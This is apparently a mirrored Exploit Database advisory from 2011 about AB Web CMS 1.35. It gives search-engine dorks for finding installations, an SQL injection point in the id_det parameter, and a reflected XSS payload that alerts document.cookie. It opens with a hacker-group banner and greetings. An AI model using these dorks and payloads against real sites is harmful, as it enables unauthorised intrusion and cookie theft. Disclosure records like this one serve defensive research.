ab Web CMS 1.35 – Multiple Vulnerabilities

• Exploit Database
• 6 阅读

• 作者： Dr.0rYX & Cr3W-DZ
  日期： 2011-01-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16044/

• ****************************************************************************************************
  * _______ ___________.__ ___________.__*
  *____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____*
  * /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ *
  *| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ *
  *|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ *
  * \/ \/ \/ \/ \/\/ \/*
  *.____ __*
  *______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ *
  * /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \*
  * \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ *
  */____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ *
  * \/ \/ \/ \/ \/ \/\/*
  *Pr!v8 Expl0iT AND t00L ** *
  
  ** 
  *ALGERIAN HACKERS*
  *********************************- NORTH-AFRICA SECURITY TEAM -*************************************
   
  [!]AB WEB CMS V.1.35 Multiple Remote Vulnerabilities 
  [!] Author: Dr.0rYX and Cr3w-DZ
  [!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
  [!] greet to:WWW.GAZA-HACKER.NET
  
  ***************************************************************************/
   
  
  [ Software Information ]
   
  [+] Vendor : http://www.aeline-informatique.com/
  [+] script : AB WEB V.1.35 
  [+] Download : http://www.aeline-informatique.com/contact.php/ (sell script )
  [+] Vulnerability : SQL injection / XSS Vulnerability 
  [+] Dork : inurl:"ab_fct.php?fct="
   inurl:" ab_gp_detail.php?id_det="
   
  **************************************************************************/
  [ Vulnerable File 1]
  
  
  http://server/[path]/ab_gp_detail.php?id_det=sql[N.A.S.T ] 
  
  [path] : fr , de 
  
  [ Exploit 1 ]
  
  
  http://server/fr/ab_gp_detail.php?id_det=SQL INJECTION 
   
  *************************************************************************/
  
  [ Vulnerable File 2]
  
  http://server/fr/ab_gp_detail.php?id_det=xss[N.A.S.T ]
  
  [ Exploit 2 ]
  
  http://www.server/fr/ab_gp_detail.php?id_det='><script>alert(document.cookie)</script>
  
  [GReet ]
   
  [+] :WWW.Gaza-hacker.net ,WWW.evilzone.org , WWW.sec4ever.com , Exploit-db.com , ALL HACKERS MUSLIMS